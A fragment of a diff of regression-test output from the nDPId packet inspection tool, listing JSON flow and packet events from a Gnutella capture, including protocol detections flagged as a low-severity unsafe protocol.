-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":73301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73301,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYZAAIAGFfgKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":73603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":73603,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAuUAAP8GvlEk6cmhCgACDwtGxFAAAAAAhIRYfFAUAAAIoAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":73064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73064,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpVAAIAGVgUKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":73065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73065,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FYFAAIAGQkoKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":73065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73065,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTJAAIAGk6kKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KcdAAIAGHhcKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UWxAAIAGasIKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kNAAIAGdAYKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJtAAIAGiMQKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0RnBAAIAGeMAKAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A99AAIAG2\/MKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73299,"flow_last_seen":73299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73299,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":73299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73299,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EFAAIAGLmIKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73299,"flow_last_seen":73299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73299,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":73299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73299,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/FxAAIAGA84KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73300,"flow_last_seen":73300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73300,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":73300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73300,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+GxAAIAG6uoKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73301,"flow_last_seen":73301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73301,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":73301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73301,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYZAAIAGFfgKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":73603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":73603,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAuUAAP8GvlEk6cmhCgACDwtGxFAAAAAAhIRYfFAUAAAIoAAA"} 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":73950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":73950,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHPwAAIARA\/8KAAIPCgAC\/wCKAIoA0UBrEQKcLgoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQDA1AEATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pXBAAIAGEbUKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q81AAIAGVuQKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWxAAIAG8swKAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVxAAIAG3h8KAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YJAAIAG1DcKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":74108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/F1AAIAGA80KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":74217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74217,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd5AAIAGwQMKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IwxAAIAGfuEKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0NAAIAGin0KAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3RAAIAGoE0KAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74327,"flow_last_seen":74327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74327,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":74327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74327,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04otAAIAG+gUKAAIPt7NacMRTJnw0vRokAAAAAIAC+vAcPAAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdJAAIAG7kEKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZARAAIAGxHUKAAIPnDkqAsRVgsQy7nYLAAAAAIAC+vCxwQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74329,"flow_last_seen":74329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74329,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":74329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07XNAAIAG0w0KAAIPUD3d9sRWd3H5FzmMAAAAAIAC+vDLcAAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":74362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74362,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuYAAEAGPaRQPd32CgACD3dxxFYAg9YB+Rc5jWAS\/\/8Y4gAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":74362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74362,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo7XRAAIAG0xgKAAIPUD3d9sRWd3H5FzmNAIPWAlAQ+vA1rgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":74510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74510,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuwAAEAGWa63s1pwCgACDyZ8xFMAhNABNL0aJWAS\/\/9vrAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":74510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74510,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo4oxAAIAG+hAKAAIPt7NacMRTJnw0vRolAITQAlAQ+vCMeAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdtAAIAGUVoKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTlAAIAG3SgKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8RAAIAGrlIKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EVBAAIAGi58KAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} 